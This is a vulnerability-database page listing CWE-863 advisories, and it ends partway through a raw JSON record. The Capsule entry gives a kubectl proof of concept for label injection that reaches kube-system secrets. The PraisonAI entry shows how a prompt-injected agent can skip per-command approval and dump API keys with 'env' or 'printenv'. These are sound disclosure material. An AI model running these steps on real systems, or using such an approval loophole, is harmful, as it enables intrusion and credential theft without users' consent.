Common Weakness Enumeration

CWE-863

Allowed-with-Review

Incorrect Authorization

Abstraction: Class · Status: Incomplete

The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check.

5556 vulnerabilities reference this CWE, most recent first.

GHSA-FCPM-6MXQ-M5VV

Vulnerability from github – Published: 2025-08-18 21:00 – Updated: 2025-08-29 20:35
VLAI
Summary
Capsule tenant owners with "patch namespace" permission can hijack system namespaces label
Details

Summary

A namespace label injection vulnerability in Capsule v0.10.3 allows authenticated tenant users to inject arbitrary labels into system namespaces (kube-system, default, capsule-system), bypassing multi-tenant isolation and potentially accessing cross-tenant resources through TenantResource selectors. This vulnerability enables privilege escalation and violates the fundamental security boundaries that Capsule is designed to enforce.

Details

The vulnerability exists in the namespace validation webhook logic located in pkg/webhook/namespace/validation/patch.go:60-77. The critical flaw is in the conditional check that only validates tenant ownership when a namespace already has a tenant label:

if label, ok := ns.Labels[ln]; ok {
    // Only checks permissions when namespace has tenant label
    if !utils.IsTenantOwner(tnt.Spec.Owners, req.UserInfo) {
        response := admission.Denied(e)
        return &response
    }
}

return nil  // Critical issue: allows operation if no tenant label exists

Root Cause Analysis: 1. Missing Default Protection: System namespaces (kube-system, default, capsule-system) do not have the capsule.clastix.io/tenant label by default 2. Bypass Logic: The webhook only enforces tenant ownership validation when the target namespace already belongs to a tenant 3. Unrestricted Label Injection: Authenticated users can inject arbitrary labels into unprotected namespaces

Attack Vector Path:

Label Injection (user-controlled) → Namespace Selector (system matching) → TenantResource/Quota Check (authorization bypass) → Cross-tenant Resource Access

This mirrors the CVE-2024-39690 attack pattern but uses label injection instead of ownerReference manipulation: - CVE-2024-39690: ownerReference(user-controlled) → tenant.Status.Namespaces(system state) → quota/permission check(auth policy) → namespace hijacking - This vulnerability: Label injection(user-controlled) → Namespace selector(system matching) → TenantResource/Quota check(auth policy) → cross-tenant resource access

PoC

Prerequisites: - Minikube cluster with Capsule v0.10.3 installed - Authenticated tenant user with basic RBAC permissions

Step 1: Environment Setup

# Install Minikube and Capsule
minikube start
helm repo add projectcapsule https://projectcapsule.github.io/charts
helm install capsule projectcapsule/capsule -n capsule-system --create-namespace

# Create tenant and user
kubectl create -f - << EOF
apiVersion: capsule.clastix.io/v1beta2
kind: Tenant
metadata:
  name: tenant1
spec:
  owners:
  - name: alice
    kind: User
EOF

# Create user certificate and kubeconfig (using provided script)
./create-user-minikube.sh alice tenant1

Step 2: Label Injection Attack

# Switch to attacker context
export KUBECONFIG=alice-tenant1.kubeconfig

# Inject malicious labels into system namespaces
kubectl patch namespace kube-system --type='json' -p='[
  {
    "op": "add",
    "path": "/metadata/labels/malicious-label",
    "value": "attack-value"
  }
]'

# Verify injection success
kubectl get namespace kube-system --show-labels

Step 3: Exploitation via TenantResource

# Create attacker-controlled namespace
kubectl create namespace alice-attack

# Create malicious TenantResource targeting injected labels
cat <<EOF | kubectl apply -f -
apiVersion: capsule.clastix.io/v1beta2
kind: TenantResource
metadata:
  name: malicious-resource
  namespace: alice-attack
spec:
  resyncPeriod: 60s
  resources:
  - namespaceSelector:
      matchLabels:
        malicious-label: "attack-value"
EOF

# Verify cross-tenant access
kubectl get tenantresource -n alice-attack malicious-resource -o yaml

Step 4: Verification of Impact

# Check if system namespace resources are now accessible
export KUBECONFIG=~/.kube/config
kubectl get namespaces -l "malicious-label=attack-value"
# Output shows: kube-system (and potentially other injected namespaces)

# Check for potential resource replication/access
kubectl get all -n kube-system
kubectl get secrets -n kube-system
kubectl get configmaps -n kube-system

Automated Testing Script: A complete vulnerability verification script is available that tests: - Label injection into multiple system namespaces - TenantResource exploitation - Cross-tenant resource access verification - Impact assessment and cleanup

Impact

Vulnerability Type: Authorization Bypass / Privilege Escalation

Who is Impacted: - Multi-tenant Kubernetes clusters using Capsule v0.10.3 and potentially earlier versions - Organizations relying on Capsule for tenant isolation and resource governance - Cloud service providers offering Kubernetes-as-a-Service with Capsule-based multi-tenancy

Security Impact: 1. Multi-tenant Isolation Bypass: Attackers can access resources from other tenants or system namespaces 2. Privilege Escalation: Tenant users can gain access to cluster-wide resources and sensitive system components 3. Data Exfiltration: Potential access to secrets, configmaps, and other sensitive data in system namespaces 4. Resource Quota Bypass: Ability to consume resources outside assigned tenant boundaries 5. Policy Circumvention: Bypass network policies, security policies, and other tenant-level restrictions

Real-world Exploitation Scenarios: - Access to kube-system secrets containing cluster certificates and service account tokens - Modification or replication of critical system configurations - Cross-tenant data access in shared clusters - Potential cluster-wide compromise through system namespace access

Severity: High - This vulnerability fundamentally breaks the multi-tenant security model that Capsule is designed to provide, allowing authenticated users to escape their tenant boundaries and access system-level resources.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/projectcapsule/capsule"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.10.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-55205"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-08-18T21:00:36Z",
    "nvd_published_at": "2025-08-18T17:15:30Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\nA namespace label injection vulnerability in Capsule v0.10.3 allows authenticated tenant users to inject arbitrary labels into system namespaces (kube-system, default, capsule-system), bypassing multi-tenant isolation and potentially accessing cross-tenant resources through TenantResource selectors. This vulnerability enables privilege escalation and violates the fundamental security boundaries that Capsule is designed to enforce.\n\n### Details\nThe vulnerability exists in the namespace validation webhook logic located in `pkg/webhook/namespace/validation/patch.go:60-77`. The critical flaw is in the conditional check that only validates tenant ownership when a namespace already has a tenant label:\n\n```go\nif label, ok := ns.Labels[ln]; ok {\n    // Only checks permissions when namespace has tenant label\n    if !utils.IsTenantOwner(tnt.Spec.Owners, req.UserInfo) {\n        response := admission.Denied(e)\n        return \u0026response\n    }\n}\n\nreturn nil  // Critical issue: allows operation if no tenant label exists\n```\n\n**Root Cause Analysis:**\n1. **Missing Default Protection**: System namespaces (kube-system, default, capsule-system) do not have the `capsule.clastix.io/tenant` label by default\n2. **Bypass Logic**: The webhook only enforces tenant ownership validation when the target namespace already belongs to a tenant\n3. **Unrestricted Label Injection**: Authenticated users can inject arbitrary labels into unprotected namespaces\n\n**Attack Vector Path:**\n```\nLabel Injection (user-controlled) \u2192 Namespace Selector (system matching) \u2192 TenantResource/Quota Check (authorization bypass) \u2192 Cross-tenant Resource Access\n```\n\nThis mirrors the CVE-2024-39690 attack pattern but uses label injection instead of ownerReference manipulation:\n- **CVE-2024-39690**: `ownerReference(user-controlled) \u2192 tenant.Status.Namespaces(system state) \u2192 quota/permission check(auth policy) \u2192 namespace hijacking`\n- **This vulnerability**: `Label injection(user-controlled) \u2192 Namespace selector(system matching) \u2192 TenantResource/Quota check(auth policy) \u2192 cross-tenant resource access`\n\n### PoC\n**Prerequisites:**\n- Minikube cluster with Capsule v0.10.3 installed\n- Authenticated tenant user with basic RBAC permissions\n\n**Step 1: Environment Setup**\n```bash\n# Install Minikube and Capsule\nminikube start\nhelm repo add projectcapsule https://projectcapsule.github.io/charts\nhelm install capsule projectcapsule/capsule -n capsule-system --create-namespace\n\n# Create tenant and user\nkubectl create -f - \u003c\u003c EOF\napiVersion: capsule.clastix.io/v1beta2\nkind: Tenant\nmetadata:\n  name: tenant1\nspec:\n  owners:\n  - name: alice\n    kind: User\nEOF\n\n# Create user certificate and kubeconfig (using provided script)\n./create-user-minikube.sh alice tenant1\n```\n\n**Step 2: Label Injection Attack**\n```bash\n# Switch to attacker context\nexport KUBECONFIG=alice-tenant1.kubeconfig\n\n# Inject malicious labels into system namespaces\nkubectl patch namespace kube-system --type=\u0027json\u0027 -p=\u0027[\n  {\n    \"op\": \"add\",\n    \"path\": \"/metadata/labels/malicious-label\",\n    \"value\": \"attack-value\"\n  }\n]\u0027\n\n# Verify injection success\nkubectl get namespace kube-system --show-labels\n```\n\n**Step 3: Exploitation via TenantResource**\n```bash\n# Create attacker-controlled namespace\nkubectl create namespace alice-attack\n\n# Create malicious TenantResource targeting injected labels\ncat \u003c\u003cEOF | kubectl apply -f -\napiVersion: capsule.clastix.io/v1beta2\nkind: TenantResource\nmetadata:\n  name: malicious-resource\n  namespace: alice-attack\nspec:\n  resyncPeriod: 60s\n  resources:\n  - namespaceSelector:\n      matchLabels:\n        malicious-label: \"attack-value\"\nEOF\n\n# Verify cross-tenant access\nkubectl get tenantresource -n alice-attack malicious-resource -o yaml\n```\n\n**Step 4: Verification of Impact**\n```bash\n# Check if system namespace resources are now accessible\nexport KUBECONFIG=~/.kube/config\nkubectl get namespaces -l \"malicious-label=attack-value\"\n# Output shows: kube-system (and potentially other injected namespaces)\n\n# Check for potential resource replication/access\nkubectl get all -n kube-system\nkubectl get secrets -n kube-system\nkubectl get configmaps -n kube-system\n```\n\n**Automated Testing Script:**\nA complete vulnerability verification script is available that tests:\n- Label injection into multiple system namespaces\n- TenantResource exploitation\n- Cross-tenant resource access verification\n- Impact assessment and cleanup\n\n### Impact\n**Vulnerability Type:** Authorization Bypass / Privilege Escalation\n\n**Who is Impacted:**\n- **Multi-tenant Kubernetes clusters** using Capsule v0.10.3 and potentially earlier versions\n- **Organizations relying on Capsule** for tenant isolation and resource governance\n- **Cloud service providers** offering Kubernetes-as-a-Service with Capsule-based multi-tenancy\n\n**Security Impact:**\n1. **Multi-tenant Isolation Bypass**: Attackers can access resources from other tenants or system namespaces\n2. **Privilege Escalation**: Tenant users can gain access to cluster-wide resources and sensitive system components\n3. **Data Exfiltration**: Potential access to secrets, configmaps, and other sensitive data in system namespaces\n4. **Resource Quota Bypass**: Ability to consume resources outside assigned tenant boundaries\n5. **Policy Circumvention**: Bypass network policies, security policies, and other tenant-level restrictions\n\n**Real-world Exploitation Scenarios:**\n- Access to kube-system secrets containing cluster certificates and service account tokens\n- Modification or replication of critical system configurations\n- Cross-tenant data access in shared clusters\n- Potential cluster-wide compromise through system namespace access\n\n**Severity:** High - This vulnerability fundamentally breaks the multi-tenant security model that Capsule is designed to provide, allowing authenticated users to escape their tenant boundaries and access system-level resources.",
  "id": "GHSA-fcpm-6mxq-m5vv",
  "modified": "2025-08-29T20:35:24Z",
  "published": "2025-08-18T21:00:36Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/projectcapsule/capsule/security/advisories/GHSA-fcpm-6mxq-m5vv"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55205"
    },
    {
      "type": "WEB",
      "url": "https://github.com/projectcapsule/capsule/commit/e1f47feade6e1695b2204407607d07c3b3994f6e"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/projectcapsule/capsule"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2025-3893"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Capsule tenant owners with \"patch namespace\" permission can hijack system namespaces label"
}

GHSA-FCRV-Q4XW-6CRP

Vulnerability from github – Published: 2024-08-30 18:30 – Updated: 2024-09-04 21:30
VLAI
Details

Zohocorp ManageEngine Endpoint Central affected by Incorrect authorization vulnerability while isolating the devices.This issue affects Endpoint Central: before 11.3.2406.08 and before 11.3.2400.15

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-38868"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-08-30T18:15:06Z",
    "severity": "HIGH"
  },
  "details": "Zohocorp ManageEngine Endpoint Central affected by\u00a0Incorrect authorization vulnerability while isolating the devices.This issue affects Endpoint Central: before 11.3.2406.08 and before 11.3.2400.15",
  "id": "GHSA-fcrv-q4xw-6crp",
  "modified": "2024-09-04T21:30:31Z",
  "published": "2024-08-30T18:30:40Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-38868"
    },
    {
      "type": "WEB",
      "url": "https://www.manageengine.com/products/desktop-central/security-updates-ngav.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-FF37-HV4Q-764F

Vulnerability from github – Published: 2022-05-24 16:51 – Updated: 2023-02-28 15:30
VLAI
Details

In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.846, a hidden action=9 feature in filemanager2.php allows attackers to execute a shell command, i.e., obtain a reverse shell with user privilege.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-13386"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-07-26T13:15:00Z",
    "severity": "HIGH"
  },
  "details": "In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.846, a hidden action=9 feature in filemanager2.php allows attackers to execute a shell command, i.e., obtain a reverse shell with user privilege.",
  "id": "GHSA-ff37-hv4q-764f",
  "modified": "2023-02-28T15:30:23Z",
  "published": "2022-05-24T16:51:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-13386"
    },
    {
      "type": "WEB",
      "url": "https://centos-webpanel.com/changelog-cwp7"
    },
    {
      "type": "WEB",
      "url": "https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13386.md"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/153876/CentOS-Control-Web-Panel-0.9.8.836-Remote-Command-Execution.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-FF84-84Q5-FQ4F

Vulnerability from github – Published: 2021-11-23 17:56 – Updated: 2023-11-14 21:49
VLAI
Summary
Incorrect Authorization in Apache Ozone
Details

In Apache Ozone versions prior to 1.2.0, certain admin related SCM commands can be executed by any authenticated users, not just by admins.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.ozone:ozone-main"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.2.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-39232"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862",
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-11-22T19:05:02Z",
    "nvd_published_at": "2021-11-19T10:15:00Z",
    "severity": "HIGH"
  },
  "details": "In Apache Ozone versions prior to 1.2.0, certain admin related SCM commands can be executed by any authenticated users, not just by admins.",
  "id": "GHSA-ff84-84q5-fq4f",
  "modified": "2023-11-14T21:49:08Z",
  "published": "2021-11-23T17:56:54Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39232"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/apache/ozone"
    },
    {
      "type": "WEB",
      "url": "https://mail-archives.apache.org/mod_mbox/ozone-dev/202111.mbox/%3C3c30a7f2-13a4-345e-6c8a-c23a2b937041%40apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2021/11/19/3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Incorrect Authorization in Apache Ozone"
}

GHSA-FF8P-PFWC-WJF2

Vulnerability from github – Published: 2022-05-24 19:04 – Updated: 2022-05-24 19:04
VLAI
Details

On NXP MIFARE Ultralight and NTAG cards, an attacker can interrupt a write operation (aka conduct a "tear off" attack) over RFID to bypass a Monotonic Counter protection mechanism. The impact depends on how the anti tear-off feature is used in specific applications such as public transportation, physical access control, etc.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-33881"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-06-06T16:15:00Z",
    "severity": "MODERATE"
  },
  "details": "On NXP MIFARE Ultralight and NTAG cards, an attacker can interrupt a write operation (aka conduct a \"tear off\" attack) over RFID to bypass a Monotonic Counter protection mechanism. The impact depends on how the anti tear-off feature is used in specific applications such as public transportation, physical access control, etc.",
  "id": "GHSA-ff8p-pfwc-wjf2",
  "modified": "2022-05-24T19:04:09Z",
  "published": "2022-05-24T19:04:09Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-33881"
    },
    {
      "type": "WEB",
      "url": "https://blog.quarkslab.com/rfid-monotonic-counter-anti-tearing-defeated.html"
    },
    {
      "type": "WEB",
      "url": "https://www.nxp.com/docs/en/application-note/AN11340.pdf"
    },
    {
      "type": "WEB",
      "url": "https://www.nxp.com/docs/en/application-note/AN13089.pdf"
    },
    {
      "type": "WEB",
      "url": "https://www.sstic.org/2021/presentation/eeprom_it_will_all_end_in_tears"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-FFFM-3RFW-H6PC

Vulnerability from github – Published: 2022-05-24 17:40 – Updated: 2022-05-24 17:40
VLAI
Details

In JetBrains TeamCity before 2020.2.1, a user could get access to the GitHub access token of another user.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-25774"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-02-03T16:15:00Z",
    "severity": "MODERATE"
  },
  "details": "In JetBrains TeamCity before 2020.2.1, a user could get access to the GitHub access token of another user.",
  "id": "GHSA-fffm-3rfw-h6pc",
  "modified": "2022-05-24T17:40:53Z",
  "published": "2022-05-24T17:40:53Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-25774"
    },
    {
      "type": "WEB",
      "url": "https://blog.jetbrains.com"
    },
    {
      "type": "WEB",
      "url": "https://blog.jetbrains.com/blog/2021/02/03/jetbrains-security-bulletin-q4-2020"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-FFGG-G824-6MXJ

Vulnerability from github – Published: 2026-03-06 00:31 – Updated: 2026-03-06 00:31
VLAI
Details

Sensitive information disclosure due to improper authorization checks. The following products are affected: Acronis Cyber Protect 17 (Linux, Windows) before build 41186.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-28715"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-06T00:16:12Z",
    "severity": "MODERATE"
  },
  "details": "Sensitive information disclosure due to improper authorization checks. The following products are affected: Acronis Cyber Protect 17 (Linux, Windows) before build 41186.",
  "id": "GHSA-ffgg-g824-6mxj",
  "modified": "2026-03-06T00:31:35Z",
  "published": "2026-03-06T00:31:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28715"
    },
    {
      "type": "WEB",
      "url": "https://security-advisory.acronis.com/advisories/SEC-5910"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-FFMC-4RRR-XM85

Vulnerability from github – Published: 2023-06-06 00:30 – Updated: 2024-04-04 04:32
VLAI
Details

The grc-policy-propagator allows security escalation within the cluster. The propagator allows policies which contain some dynamically obtained values (instead of the policy apply a static manifest on a managed cluster) of taking advantage of cluster scoped access in a created policy. This feature does not restrict properly to lookup content from the namespace where the policy was created.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-3027"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-269",
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-06-05T22:15:12Z",
    "severity": "HIGH"
  },
  "details": "The grc-policy-propagator allows security escalation within the cluster. The propagator allows policies which contain some dynamically obtained values (instead of the policy apply a static manifest on a managed cluster) of taking advantage of cluster scoped access in a created policy. This feature does not restrict properly to lookup content from the namespace where the policy was created.",
  "id": "GHSA-ffmc-4rrr-xm85",
  "modified": "2024-04-04T04:32:36Z",
  "published": "2023-06-06T00:30:19Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-3027"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2211468#c0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-FFP3-3562-8CV3

Vulnerability from github – Published: 2026-04-10 19:28 – Updated: 2026-06-19 21:33
VLAI
Summary
PraisonAI: Coarse-Grained Tool Approval Cache Bypasses Per-Invocation Consent for Shell Commands
Details

Summary

The approval system in PraisonAI Agents caches tool approval decisions by tool name only, not by invocation arguments. Once a user approves execute_command for any command (e.g., ls -la), all subsequent execute_command calls in that execution context bypass the approval prompt entirely. Combined with os.environ.copy() passing all process environment variables to subprocesses, this allows an LLM agent (potentially via prompt injection) to silently exfiltrate API keys and credentials without further user consent.

Details

The require_approval decorator in src/praisonai-agents/praisonaiagents/approval/__init__.py:176-178 checks approval status by tool name only:

@wraps(func)
def wrapper(*args, **kwargs):
    if is_already_approved(tool_name):   # line 177 — checks only tool_name
        return func(*args, **kwargs)     # line 178 — bypasses ALL approval

The mark_approved function in registry.py:144-147 stores only the tool name string:

def mark_approved(self, tool_name: str) -> None:
    approved = self._approved_context.get(set())
    approved.add(tool_name)              # stores "execute_command", not args
    self._approved_context.set(approved)

The approval context is never cleared during agent execution — clear_approved() exists (registry.py:152) but is never called in the agent's tool execution path (agent/tool_execution.py).

Meanwhile, the ConsoleBackend UI at backends.py:95-96 misleads the user:

return Confirm.ask(
    f"Do you want to execute this {request.risk_level} risk tool?",
    # "this" implies per-invocation approval
)

The UI displays the specific command arguments (lines 81-85), creating a reasonable expectation that the user is approving only that specific invocation.

Additionally, shell_tools.py:77 passes the full process environment to every subprocess:

process_env = os.environ.copy()  # includes OPENAI_API_KEY, etc.

There is no command filtering, blocklist, or environment variable sanitization in the shell tools module.

PoC

from praisonaiagents import Agent
from praisonaiagents.tools.shell_tools import execute_command

# Step 1: Create agent with shell tool
agent = Agent(
    name="worker",
    instructions="You are a helpful assistant.",
    tools=[execute_command]
)

# Step 2: Agent requests benign command — user sees Rich panel:
#   Function: execute_command
#   Risk Level: CRITICAL
#   Arguments:
#     command: ls -la
#   "Do you want to execute this critical risk tool?" [y/N]
# User approves → mark_approved("execute_command") is called

# Step 3: All subsequent execute_command calls bypass approval silently:
# execute_command(command="env")
#   → returns ALL environment variables (OPENAI_API_KEY, AWS_SECRET_ACCESS_KEY, etc.)
#   → NO approval prompt shown

# Step 4: Targeted extraction also bypasses approval:
# execute_command(command="printenv OPENAI_API_KEY")
#   → returns the specific API key
#   → NO approval prompt shown

# Verification: check the approval cache
from praisonaiagents.approval import is_already_approved
# After approving "ls -la":
# is_already_approved("execute_command") → True
# Any execute_command call now returns immediately at __init__.py:177-178

Impact

  • Secret exfiltration: An LLM agent (or one subjected to prompt injection) can dump all process environment variables after a single benign command approval. Common secrets include OPENAI_API_KEY, AWS_SECRET_ACCESS_KEY, DATABASE_URL, and any other credentials passed via environment.
  • Misleading consent UI: The console prompt displays specific arguments and uses language ("this tool") that implies per-invocation consent, but the system grants session-wide blanket approval.
  • No expiration or scope: The approval cache uses a ContextVar that persists for the entire agent execution context with no timeout, no command-count limit, and no clearing between tool calls.
  • No environment filtering: os.environ.copy() passes every environment variable to subprocesses without filtering sensitive patterns.

Recommended Fix

  1. Per-invocation approval for critical tools — store a hash of (tool_name, arguments) instead of just tool_name, or require re-approval for each invocation of critical-risk tools:
# In registry.py — change mark_approved/is_already_approved:
import hashlib, json

def mark_approved(self, tool_name: str, arguments: dict = None) -> None:
    approved = self._approved_context.get(set())
    risk = self._risk_levels.get(tool_name)
    if risk == "critical" and arguments:
        key = f"{tool_name}:{hashlib.sha256(json.dumps(arguments, sort_keys=True).encode()).hexdigest()}"
    else:
        key = tool_name
    approved.add(key)
    self._approved_context.set(approved)

def is_already_approved(self, tool_name: str, arguments: dict = None) -> bool:
    approved = self._approved_context.get(set())
    risk = self._risk_levels.get(tool_name)
    if risk == "critical" and arguments:
        key = f"{tool_name}:{hashlib.sha256(json.dumps(arguments, sort_keys=True).encode()).hexdigest()}"
        return key in approved
    return tool_name in approved
  1. Filter environment variables in shell_tools.py:
SENSITIVE_PATTERNS = ('_KEY', '_SECRET', '_TOKEN', '_PASSWORD', '_CREDENTIAL')

process_env = {
    k: v for k, v in os.environ.items()
    if not any(p in k.upper() for p in SENSITIVE_PATTERNS)
}
if env:
    process_env.update(env)
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "praisonaiagents"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.5.128"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-56074"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-10T19:28:38Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThe approval system in PraisonAI Agents caches tool approval decisions by tool name only, not by invocation arguments. Once a user approves `execute_command` for any command (e.g., `ls -la`), all subsequent `execute_command` calls in that execution context bypass the approval prompt entirely. Combined with `os.environ.copy()` passing all process environment variables to subprocesses, this allows an LLM agent (potentially via prompt injection) to silently exfiltrate API keys and credentials without further user consent.\n\n## Details\n\nThe `require_approval` decorator in `src/praisonai-agents/praisonaiagents/approval/__init__.py:176-178` checks approval status by tool name only:\n\n```python\n@wraps(func)\ndef wrapper(*args, **kwargs):\n    if is_already_approved(tool_name):   # line 177 \u2014 checks only tool_name\n        return func(*args, **kwargs)     # line 178 \u2014 bypasses ALL approval\n```\n\nThe `mark_approved` function in `registry.py:144-147` stores only the tool name string:\n\n```python\ndef mark_approved(self, tool_name: str) -\u003e None:\n    approved = self._approved_context.get(set())\n    approved.add(tool_name)              # stores \"execute_command\", not args\n    self._approved_context.set(approved)\n```\n\nThe approval context is never cleared during agent execution \u2014 `clear_approved()` exists (`registry.py:152`) but is never called in the agent\u0027s tool execution path (`agent/tool_execution.py`).\n\nMeanwhile, the `ConsoleBackend` UI at `backends.py:95-96` misleads the user:\n\n```python\nreturn Confirm.ask(\n    f\"Do you want to execute this {request.risk_level} risk tool?\",\n    # \"this\" implies per-invocation approval\n)\n```\n\nThe UI displays the specific command arguments (lines 81-85), creating a reasonable expectation that the user is approving only that specific invocation.\n\nAdditionally, `shell_tools.py:77` passes the full process environment to every subprocess:\n\n```python\nprocess_env = os.environ.copy()  # includes OPENAI_API_KEY, etc.\n```\n\nThere is no command filtering, blocklist, or environment variable sanitization in the shell tools module.\n\n## PoC\n\n```python\nfrom praisonaiagents import Agent\nfrom praisonaiagents.tools.shell_tools import execute_command\n\n# Step 1: Create agent with shell tool\nagent = Agent(\n    name=\"worker\",\n    instructions=\"You are a helpful assistant.\",\n    tools=[execute_command]\n)\n\n# Step 2: Agent requests benign command \u2014 user sees Rich panel:\n#   Function: execute_command\n#   Risk Level: CRITICAL\n#   Arguments:\n#     command: ls -la\n#   \"Do you want to execute this critical risk tool?\" [y/N]\n# User approves \u2192 mark_approved(\"execute_command\") is called\n\n# Step 3: All subsequent execute_command calls bypass approval silently:\n# execute_command(command=\"env\")\n#   \u2192 returns ALL environment variables (OPENAI_API_KEY, AWS_SECRET_ACCESS_KEY, etc.)\n#   \u2192 NO approval prompt shown\n\n# Step 4: Targeted extraction also bypasses approval:\n# execute_command(command=\"printenv OPENAI_API_KEY\")\n#   \u2192 returns the specific API key\n#   \u2192 NO approval prompt shown\n\n# Verification: check the approval cache\nfrom praisonaiagents.approval import is_already_approved\n# After approving \"ls -la\":\n# is_already_approved(\"execute_command\") \u2192 True\n# Any execute_command call now returns immediately at __init__.py:177-178\n```\n\n## Impact\n\n- **Secret exfiltration**: An LLM agent (or one subjected to prompt injection) can dump all process environment variables after a single benign command approval. Common secrets include `OPENAI_API_KEY`, `AWS_SECRET_ACCESS_KEY`, `DATABASE_URL`, and any other credentials passed via environment.\n- **Misleading consent UI**: The console prompt displays specific arguments and uses language (\"this tool\") that implies per-invocation consent, but the system grants session-wide blanket approval.\n- **No expiration or scope**: The approval cache uses a `ContextVar` that persists for the entire agent execution context with no timeout, no command-count limit, and no clearing between tool calls.\n- **No environment filtering**: `os.environ.copy()` passes every environment variable to subprocesses without filtering sensitive patterns.\n\n## Recommended Fix\n\n1. **Per-invocation approval for critical tools** \u2014 store a hash of `(tool_name, arguments)` instead of just `tool_name`, or require re-approval for each invocation of critical-risk tools:\n\n```python\n# In registry.py \u2014 change mark_approved/is_already_approved:\nimport hashlib, json\n\ndef mark_approved(self, tool_name: str, arguments: dict = None) 